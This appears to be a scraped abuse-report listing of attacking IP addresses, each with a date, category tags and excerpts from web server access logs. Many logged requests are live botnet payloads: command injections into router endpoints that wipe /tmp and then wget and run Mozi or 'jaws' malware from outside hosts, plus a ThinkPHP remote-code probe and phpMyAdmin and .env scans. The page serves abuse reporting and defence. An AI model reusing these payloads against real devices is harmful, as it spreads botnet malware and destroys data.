๐ฎ๐ณ
117.212.171.28
23 Aug 2022
[22/Aug/2022:16:59:48 -0400] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wge ...
show more
[22/Aug/2022:16:59:48 -0400] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.212.171.28:60724/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
show less
Exploited Host
๐น๐ท
81.215.207.79
15 Aug 2022
81.215.207.79 - - [13/Aug/2022:02:04:54 -0400] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 1011 ...
show more
81.215.207.79 - - [13/Aug/2022:02:04:54 -0400] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 10116 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
9784 81.215.207.79 - - [13/Aug/2022:02:04:54 -0400] "GET /sql/webadmin/index.php?lang=en HTTP/1.1" 404 10120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
9785 81.215.207.79 - - [13/Aug/2022:02:04:54 -0400] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 10122 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
show less
SQL Injection
Web App Attack
๐ฉ๐ช
91.96.3.211
15 Aug 2022
91.96.3.211 - - [14/Aug/2022:10:46:11 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+synss.cf/jaws;sh+/tmp ...
show more
91.96.3.211 - - [14/Aug/2022:10:46:11 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+synss.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 10157 "-" "Hello, world"
show less
Web App Attack
SSH
๐ฌ๐ง
18.130.149.154
01 Aug 2022
18.130.149.154 - - [30/Jul/2022:10:43:09 -0400] "GET /node HTTP/1.1" 404 10068 "-" "'Cloud mapping e ...
show more
18.130.149.154 - - [30/Jul/2022:10:43:09 -0400] "GET /node HTTP/1.1" 404 10068 "-" "'Cloud mapping experiment. Contact [email protected] '"
12927 18.130.149.154 - - [30/Jul/2022:10:43:13 -0400] "GET /login.cs HTTP/1.1" 403 10076 "-" "'Cloud mapping experiment. Contact [email protected] '"
12928 18.130.149.154 - - [30/Jul/2022:10:43:17 -0400] "GET /login HTTP/1.1" 404 10070 "-" "'Cloud mapping experiment. Contact [email protected] '"
show less
Brute-Force
Web App Attack
๐บ๐ธ
142.93.126.113
23 Jun 2022
142.93.126.113 - - [23/Jun/2022:03:38:40 -0400] "GET /streaming/clients_live.php HTTP/1.1" 404 10112 ...
show more
142.93.126.113 - - [23/Jun/2022:03:38:40 -0400] "GET /streaming/clients_live.php HTTP/1.1" 404 10112 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
8562 142.93.126.113 - - [23/Jun/2022:03:38:41 -0400] "GET /stalker_portal/c/version.js HTTP/1.1" 404 10114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
8563 142.93.126.113 - - [23/Jun/2022:03:38:42 -0400] "GET /stream/live.php HTTP/1.1" 404 10090 "-" "VLC/3.0.8 LibVLC/3.0.8"
8564 142.93.126.113 - - [23/Jun/2022:03:38:43 -0400] "GET /flu/403.html HTTP/1.1" 404 10084 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
show less
Web App Attack
๐ฐ๐ท
220.94.247.213
14 Jun 2022
188.149.24.120 - - [13/Jun/2022:08:29:39 -0400] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 ...
show more
188.149.24.120 - - [13/Jun/2022:08:29:39 -0400] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 10120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6559 188.149.24.120 - - [13/Jun/2022:08:29:39 -0400] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 10130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6560 188.149.24.120 - - [13/Jun/2022:08:29:39 -0400] "GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 10124 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
show less
SQL Injection
Brute-Force
Web App Attack
๐ธ๐ช
188.149.24.120
14 Jun 2022
188.149.24.120 - - [13/Jun/2022:08:29:52 -0400] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 101 ...
show more
188.149.24.120 - - [13/Jun/2022:08:29:52 -0400] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 10114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6673 188.149.24.120 - - [13/Jun/2022:08:29:52 -0400] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 404 10114 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6674 188.149.24.120 - - [13/Jun/2022:08:29:52 -0400] "GET /sql/webadmin/index.php?lang=en HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
show less
SQL Injection
Web App Attack
๐จ๐ฆ
70.73.26.178
14 Jun 2022
6806 70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1 ...
show more
6806 70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 10124 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6807 70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 10116 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6808 70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 10130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
show less
SQL Injection
Web App Attack
๐จ๐ฆ
70.38.60.69
14 Jun 2022
70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 101 ...
show more
70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6806 70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 10124 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6807 70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 10116 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
6808 70.73.26.178 - - [13/Jun/2022:14:06:48 -0400] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 10130 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
show less
SQL Injection
Web App Attack
๐จ๐ณ
180.109.51.245
30 Mar 2022
180.109.51.245 - - [29/Mar/2022:21:09:45 -0400] "HEAD http://110.242.68.4/ HTTP/1.1" 200 - "-" "Mozi ...
show more
180.109.51.245 - - [29/Mar/2022:21:09:45 -0400] "HEAD http://110.242.68.4/ HTTP/1.1" 200 - "-" "Mozilla/5.01724933 Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E302"
show less
Exploited Host
๐จ๐ฆ
99.209.32.244
29 Mar 2022
99.209.32.244 - - [28/Mar/2022:00:41:51 -0400] "GET /.env HTTP/1.1" 403 10066 "-" "Mozilla/5.0 (X11; ...
show more
99.209.32.244 - - [28/Mar/2022:00:41:51 -0400] "GET /.env HTTP/1.1" 403 10066 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
12716 99.209.32.244 - - [28/Mar/2022:00:41:51 -0400] "POST / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
show less
Hacking
๐ช๐ฌ
41.239.28.200
28 Mar 2022
41.239.28.200 - - [23/Mar/2022:16:55:26 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/ja ...
show more
41.239.28.200 - - [23/Mar/2022:16:55:26 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 10143 "-" "-"
show less
Exploited Host
๐ช๐ฌ
41.37.239.213
28 Mar 2022
41.37.239.213 - - [25/Mar/2022:00:51:05 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/ja ...
show more
41.37.239.213 - - [25/Mar/2022:00:51:05 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 10140 "-" "-"
show less
Exploited Host
๐ฎ๐ณ
59.99.201.98
28 Mar 2022
59.99.201.98 - - [25/Mar/2022:17:08:17 -0400] "POST /HNAP1/ HTTP/1.0" 400 10104 "-" "-"
Open Proxy
๐จ๐ณ
120.12.237.60
28 Mar 2022
120.12.237.60 - - [25/Mar/2022:18:27:27 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://120.12.237.6 ...
show more
120.12.237.60 - - [25/Mar/2022:18:27:27 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://120.12.237.60:41698/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 10254 "-" "Hello, world"
show less
Brute-Force
๐ท๐ด
5.13.14.132
28 Mar 2022
5.13.14.132 - - [27/Mar/2022:05:41:04 -0400] "POST /editBlackAndWhiteList HTTP/1.1" 404 10100 "-" "M ...
show more
5.13.14.132 - - [27/Mar/2022:05:41:04 -0400] "POST /editBlackAndWhiteList HTTP/1.1" 404 10100 "-" "Mozila/5.0"
show less
Brute-Force
๐ช๐ฌ
156.198.13.153
28 Mar 2022
156.198.13.153 - - [28/Mar/2022:05:46:21 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/j ...
show more
156.198.13.153 - - [28/Mar/2022:05:46:21 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 10140 "-" "-"
show less
Brute-Force
๐ช๐ฌ
156.215.43.86
28 Mar 2022
156.215.43.86 - - [24/Mar/2022:22:48:32 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/ja ...
show more
156.215.43.86 - - [24/Mar/2022:22:48:32 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 10142 "-" "-"
show less
Brute-Force
๐ซ๐ท
90.84.171.75
28 Mar 2022
90.84.171.75 - - [25/Mar/2022:13:50:11 -0400] "GET /manager/html HTTP/1.1" 404 10088 "-" "Mozilla/5. ...
show more
90.84.171.75 - - [25/Mar/2022:13:50:11 -0400] "GET /manager/html HTTP/1.1" 404 10088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
14470 90.84.171.75 - - [25/Mar/2022:13:50:11 -0400] "GET /wp-login.php HTTP/1.1" 404 10088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
14471 90.84.171.75 - - [25/Mar/2022:13:50:11 -0400] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=nar48ax8 HTTP/1.1" 403 10280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
show less
Brute-Force
๐ช๐ฌ
197.61.100.104
28 Mar 2022
197.61.100.104 - - [26/Mar/2022:05:31:44 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/j ...
show more
197.61.100.104 - - [26/Mar/2022:05:31:44 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 10142 "-" "-"
show less
Brute-Force
๐ช๐ฌ
41.235.185.68
28 Mar 2022
41.235.185.68 - - [26/Mar/2022:10:41:14 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/ja ...
show more
41.235.185.68 - - [26/Mar/2022:10:41:14 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 10142 "-" "-"
show less
Brute-Force
๐ช๐ฌ
156.213.137.2
28 Mar 2022
156.213.137.2 - - [26/Mar/2022:11:06:15 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/ja ...
show more
156.213.137.2 - - [26/Mar/2022:11:06:15 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 10142 "-" "-"
show less
Brute-Force
๐ง๐ท
138.204.70.125
28 Mar 2022
12632 138.204.70.125 - - [26/Mar/2022:12:54:56 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.
Brute-Force
๐ช๐ฌ
156.199.174.10
28 Mar 2022
.
12640 156.199.174.10 - - [26/Mar/2022:15:10:04 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.j ...
show more
.
12640 156.199.174.10 - - [26/Mar/2022:15:10:04 -0400] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdai
show less
Brute-Force
๐ฎ๐ณ
117.194.167.92
25 Mar 2022
117.194.167.92 - - [25/Mar/2022:07:16:59 -0400] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi ...
show more
117.194.167.92 - - [25/Mar/2022:07:16:59 -0400] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 10098 "-" "-"
show less
Exploited Host